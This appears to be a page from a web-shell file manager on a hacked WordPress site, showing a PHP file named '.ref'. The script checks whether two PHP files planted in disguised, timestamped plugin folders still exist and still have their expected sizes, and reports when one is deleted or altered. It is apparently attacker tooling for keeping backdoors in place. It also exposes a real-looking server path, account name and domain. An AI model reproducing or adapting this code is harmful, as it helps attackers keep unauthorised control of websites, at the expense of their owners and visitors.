KOK - MANAGER
Edit File: .ref
<?php $r = ''; $x = ["/home/emarhioz/blog.newkolkata.in/wp-content/plugins/seo_1766680423/custom.file.3.1766680426.php"=>"bd@@27245@@741", "/home/emarhioz/blog.newkolkata.in/wp-content/plugins/gallery_1766681009/assets/css/custom-file-3-1766681012.php"=>"bd@@36982@@874"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');